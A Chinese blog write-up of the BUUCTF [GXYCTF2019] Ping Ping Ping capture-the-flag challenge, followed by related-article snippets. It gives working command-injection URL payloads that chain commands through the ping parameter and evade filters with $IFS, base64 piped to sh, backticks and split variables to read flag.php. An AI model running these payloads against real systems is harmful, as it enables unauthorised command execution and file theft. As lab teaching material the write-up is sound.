【BUUCTF】[GXYCTF2019]Ping Ping Ping 1

最新推荐文章于 2024-10-29 09:44:29 发布
最新推荐文章于 2024-10-29 09:44:29 发布
阅读量350 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf 文章标签: php linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/manerzi/article/details/128342941
本文介绍了一种绕过网站文件名过滤的方法,通过使用特殊字符和编码技巧,成功访问被过滤的flag文件。文章详细展示了如何利用$IFS变量和base64编码来规避常见的安全限制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述在这里插入图片描述列出当前目录下的文件
?ip=1;ls
在这里插入图片描述那么我们就要打开flag.php文件
在这里插入图片描述
发现过滤了空格
经过测试我们发现$IFS$9 可以绕过空格
在这里插入图片描述又发现它绕过了flag
我们先看看index.php
在这里插入图片描述
得知flag的过滤方式
我们可以采用base64方法编码方式绕过
需要执行的命令:

cat$IFS$9flag.php

编码后:

Y2F0JElGUyQ5ZmxhZy5waHA=

so, payload如下

?ip=1;echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh

在这里插入图片描述

[GXYCTF2019]Ping Ping Ping1
jamesP777的博客
07-17 424
还过滤了flag,我们用字符拼接的方式看能否绕过,a=g;注意这里用分号间隔,所以不能用管道符连接了。可以看到flag了。这里有个坑,这段是纯php代码,所以在页面上没有显示出来,要注意观察界面的源码。既然ls能把flag找出来, 则还可以利用内联的方式获取flag cat$IFS$1`ls`结果应该就在flag.php。基本上可以看到过滤了哪些内容。可以看到过滤了空格,用 $IFS$1替换空格。结合题目名称,考虑是命令注入,试试ls。
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1367
BUUctf [GXYCTF2019]Ping Ping Ping
[GXYCTF2019]Ping Ping Ping 1
qq_43618536的博客
07-01 2855
BUUCTF的[GXYCTF2019]Ping Ping Ping
BUUCTF [GXYCTF2019]Ping Ping Ping 1
m0_62879498的博客
03-11 6726
[GXYCTF2019]Ping Ping Ping 1 在本题我们考察的是命令执行 已进入本关,我们发现他在询问 ?ip 我们先尝试输入 ?ip=127.0.0.1 发现访问成功 查询一下它的目录: ?ip=127.0.0.1|ls 发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。 ?ip=127.0.0.1|cat flag.php 点击查询, 很明显我们需要进行一个空格的过滤 空格过滤常见绕过注释: < > %20(spac
BUUCTF[GXYCTF2019]Ping Ping Ping 1
徐海洋
02-01 437
[GXYCTF2019]Ping Ping Ping 1
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5497
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
[BUUCTF]-Web:[GXYCTF2019]Ping Ping Ping解析(贪婪匹配,空格过滤)
2301_79326813的博客
01-31 1599
先看网页按照正常流程,先ip+ls,可以看到flag但是不能直接得flag,他应该是过滤掉了一点东西。这里考虑过滤掉了空格。
[GXYCTF2019] Ping Ping
Sweet_vinegar520的博客
10-29 719
本题主要阴间在绕过字符和变量的运用细节上。
BUUCTF__[GXYCTF2019]Ping Ping Ping_题解
风过江南乱的博客
06-25 3439
前言 我感觉我是一个假的理科生,假的计算机相关专业学生,完全没有该有的样子 这题有点东西,不算太水。只是对我来说。 读题 题目是Ping,打开也没有内容,就一个get传参的ip变量 不过看到ip和ping就容易联想到,终端ping命令。 先尝试传入一个ip=127.0.0.1,于是乎出现了如下,在终端下执行的效果就是这样,命令执行石锤了。 命令执行可以干很多事,也就是命令行,LInux下大佬们日常操作都用命令行代替鼠标。 首先想到用什么办法?让它执行我们需要的命令。很明显变量ip是突破点。 先看传
buuctf [GXYCTF2019]Ping Ping Ping
最新发布
03-28
### BUUCTF GXYCTF2019 Ping Ping Ping Writeup 解题思路 该题目属于命令执行绕过类题目,主要考察选手对于PHP代码中的输入验证机制以及Linux命令执行的理解。以下是详细的解题分析: #### 题目背景 通过提供的代码片段可以看出,程序接收用户提交的`ip`参数,并将其作为`shell_exec()`函数的一部分来调用`ping`命令[^4]。然而,在实际运行过程中,存在多层正则表达式过滤逻辑,用于防止恶意字符注入和敏感关键字(如`flag`)的出现。 #### 绕过方法解析 ##### 方法一:利用`${IFS}`替代空格 由于题目明确指出对空白字符进行了严格过滤,因此无法直接使用空格分隔命令参数。可以通过引入环境变量`${IFS}`(Internal Field Separator),它默认表示为空白符,从而完成命令拼接[^3]: ```bash /?ip=cat${IFS}/flag.php ``` ##### 方法二:内联执行与反引号组合 除了替换空格外,还可以借助Shell内置功能——内联执行(Backticks)。这种方式允许在一个命令内部嵌套另一个子命令的结果作为其一部分参与运算[^1]: ```bash /?ip=`cat flag.php` ``` ##### 方法三:变量拆分重组 当某些特定单词被整体屏蔽时(例如这里的“flag”),可以考虑将目标字符串分割成多个部分分别赋值给不同变量名,最后再动态组装起来形成最终路径[^2]: ```php /?ip=127.0.0.1;b=ag;a=fl;cat$IFS$a$b.php ``` 以上三种方案均能有效规避现有检测规则限制的同时达成预期效果即读取服务器上的文件内容。 #### 实际操作演示 假设我们已经找到了合适的payload,则可以直接访问对应URL地址获取FLAG信息。例如采用第二种方法的话请求形式如下所示: ```http GET /?ip=`cat%20flag.php` HTTP/1.1 Host: target-server.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` 如果一切正常,响应数据中应该会包含我们需要的目标文件具体内容。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值